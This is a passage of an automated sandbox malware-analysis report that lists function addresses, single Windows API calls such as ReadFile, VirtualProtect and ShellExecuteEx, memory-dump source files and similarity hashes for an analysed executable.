                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                    • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                                                                                                                                    • Instruction ID: ff59ce228810ab0b399ea54ffc24e93d20618ce1ebfa51e1db99450e15aaec59
                                                                                                                                                                                    • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                                                                                                                                    • Instruction Fuzzy Hash: FAC08C30200101ABDB010B318F08B073A62AB80380F0288396042E00B4CA308004C92E
                                                                                                                                                                                    Function 004025C4 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2111968516-0
                                                                                                                                                                                    • Opcode ID: e235dcb744ebcc946608d91797e9ef60a83683288e53699933f586765b830fd2
                                                                                                                                                                                    • Instruction ID: 7874e25a1fd417281295b021b6ee833f9e9a2ca8db09fa59ccc2d9f5114d9ff1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e235dcb744ebcc946608d91797e9ef60a83683288e53699933f586765b830fd2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 33213B70D04299BECF318B689548AAEBF709F11304F14847FE4D0B62D1C5BE8A82CF19
                                                                                                                                                                                    Function 00402682 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A0
                                                                                                                                                                                      • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                                                                    • Opcode ID: 7662d08dcc9a9cf2f1584379864cce10a11a63027859f8beda7d63d36f93d70d
                                                                                                                                                                                    • Instruction ID: f1c15ab6bd15a9d9cc501090f462d0785fe3296bea48be5e975bb3477ad6cc2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7662d08dcc9a9cf2f1584379864cce10a11a63027859f8beda7d63d36f93d70d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49E06DB2B04216AED700BBA5AA49DBFBB68DB40314F20403BF544F10C1CA788D029B2D
                                                                                                                                                                                    Function 004022F6 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                                                                    • Opcode ID: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
                                                                                                                                                                                    • Instruction ID: f472a2c509351f333654906e099da5e6dfd11f42980ce41b172c94471a0d1cd1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BE01A31B401246ADB207AB10E8E96E14989BC4744B29053ABE05B62C3DDBC4C414AB9
                                                                                                                                                                                    Function 00405B76 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031A6,00000000,00000000,00402FD0,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                                                                                                                                    • Instruction ID: d6e1a33fd195441beba49eedd959afadaf6b56434895abd4101947bffd5346ea
                                                                                                                                                                                    • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21E0EC3221065EABDF10AE559C04AEB7B6CEB05360F004437F915E3150D635F9219BA8
                                                                                                                                                                                    Function 00405BA5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040315C,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BB9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                                                                                                    • Instruction ID: 823d1a00ca840d25d454e1cdeec80758da7ba5e35e2b738bcb0e321267d0793f
                                                                                                                                                                                    • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DEE0EC3222075EAFDF50AE559C00AEB7B7CEB05760F004437F925E2190E631F9219BAC
                                                                                                                                                                                    Function 10002709 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002727
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                    • Instruction ID: e09dfa788fffc30199ef0a9f627684cb70e95bce5f527532b7ad3e980fb418b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F09BF19092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB7441448B19
                                                                                                                                                                                    Function 00405DEB Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E79,?,?,?,?,00000002,Call), ref: 00405E0F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                    • Instruction ID: dc79c12829c29cd0bf07e2dbeefb197667dc07549b84f10616122407915bdb74
                                                                                                                                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                    • Instruction Fuzzy Hash: E4D0123210060DBBDF115F90ED05FAB371DEB48314F004826FE45A4091E775D670AF98
                                                                                                                                                                                    Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: f78411d9339179b1bfaf7e550eba22c56aaeced5b6accf1d661454cbe72d999c
                                                                                                                                                                                    • Instruction ID: 006896c4a7345e69559ade13805c89d17ea4f3f6c129434cfdd3d67a61d48342
                                                                                                                                                                                    • Opcode Fuzzy Hash: f78411d9339179b1bfaf7e550eba22c56aaeced5b6accf1d661454cbe72d999c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 10D012727081129BCB10EBA8AB48A9E77A49B50324B308137D515F31D1E6B9C945672D
                                                                                                                                                                                    Function 00404072 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(0001044A,00000000,00000000,00000000), ref: 00404084
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                                                                                                                                                                    • Instruction ID: da44989f2a2ecf2e1eb1395d2787a6f6d01b979c61270caf9d732ef337717c06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6C04C717406006AEA208B519E49F0677586750B11F1484397751F50D0C675E410DE1C
                                                                                                                                                                                    Function 00405647 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteExA.SHELL32(?,0040444B,?), ref: 00405656
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 587946157-0
                                                                                                                                                                                    • Opcode ID: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                                                                                                                                                                    • Instruction ID: fedc52184ae6edd1acf052e6849869f1d6de8b7351bc39b82099fbd6471e80b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECC092B2000200DFE301CF90CB18F077BE8AF55306F028058E1C49A160C7788810CB69
                                                                                                                                                                                    Function 0040405B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                                                                                                                                                                    • Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
                                                                                                                                                                                    Function 004031A9 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 004031B7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
